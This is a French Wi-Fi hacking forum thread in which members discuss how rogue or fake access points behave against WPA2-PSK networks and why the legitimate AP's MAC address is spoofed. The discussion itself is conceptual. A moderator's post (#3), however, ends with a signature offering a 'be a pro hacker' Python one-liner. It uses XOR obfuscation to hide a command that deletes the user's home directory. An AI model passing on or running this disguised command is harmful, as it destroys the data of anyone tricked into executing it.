Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 24-05-2012 12:21:25

Nico75
N00b

Demande de précisions sur la rogue AP (ou Fake AP)

Bonjour à tous,
Je suis en train d'essayer de comprendre le concept de rogueAP et j'aurais besoin de votre expertise sur le sujet car toutes les informations que j'ai pu lire ne répondent pas clairement à ma question.

Ma question est la suivante:
Une RogueAP (ou FakeAP) est une attaque consistant à se faire passer pour un point d'accès légitime afin de se mettre en position de MITM entre le client et l'AP légitime.
Cependant, cela fonctionne uniquement sur des hotspots (donc sans authentification) ou aussi sur les points d'accès sécurisés avec WPA2/PSK par exemple ?

Car dans le cas ou l'on se fait passer pour un points d'accès sécurisé avec WPA2/PSK (comme par exemple une livebox), le client qui tente de se connecté à notre FakeAP parcqu'elle possède le même ESSID va s'attendre a faire un handshake alors que notre FakeAP est sans authentification.
Comment cela fonctionne ?

J'espère avoir été clair, cela n'est pas évident.

Une question subsidiaire:
J'ai vu certains tutos qu'ils utilisent l'option -a pour spoofer l'adresse MAC de l'AP légitime, a quoi cela sert-il ?
Le client enregistre la MAC de l'AP et refuse de se connecter à une AP fournissant le même ESSID mais avec une MAC différente ?

Quelqu'un peut m'éclairer de son expertise ?
Cordialement.

Dernière modification par Nico75 (24-05-2012 16:25:02)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 25-05-2012 12:58:51

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : Demande de précisions sur la rogue AP (ou Fake AP)

Bonjour Nico75 et bienvenue à toi sur notre forum smile
Comme tu as vu j'ai supprimé ton up, "la prisa mata" ( être pressé tue ) wink
Les questions que tu posent sont très pertinentes. Je ne suis pas un expert en la matière, donc je ne peux pas vraiment te dire grand chose tongue
Il te faudra attendre un peu plus... wink

#3 25-05-2012 14:28:38

spawn
Modérateur

Attends que j'aie fini mon projet pour minuit et je te répondrais bien.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 27-05-2012 21:17:17

koala
Membre d'honneur
Lieu : In the sky

Salut Nico75 smile

Questions intérèssantes que j'ai chercher a développer et que je chercherai encore quand j'aurais plus de temps.L'essid et l'adresse MAC n'ont qu'un role "déguisé" si je puis dire, on ne peut pas en spoofant l'adresse MAC et l'essid, faire connecter la victime au fake en revanche il est possible de faire connecter la victime possédant une livebox2 a une autre Livebox2 (la fake) si le canal et cryptage est le meme ; oui mais problème le temps que reste connecter la victime au fake est très faible (une vingtaine de secondes).Du coup j'ai pensé a tenter d'utiliser le WPS qui contient aussi certaines failles pour tenter d'aller au bout de mon idée mais le résultat est le meme, la connexion s'estompe rapidement.

Ce qui est étrange dans tout ça c'est que ça ne semble marcher qu'entre 2 livebox ou 2 Bbox (sachant que l'une est fake).J'ai pas le temps d'approfondir la chose encore mais je te laisse le post ou j'ai fais des recherches la dessus, ça peut servir a d'autres aussi par la meme occaze wink

Projet rogue AP/WPS

Annonce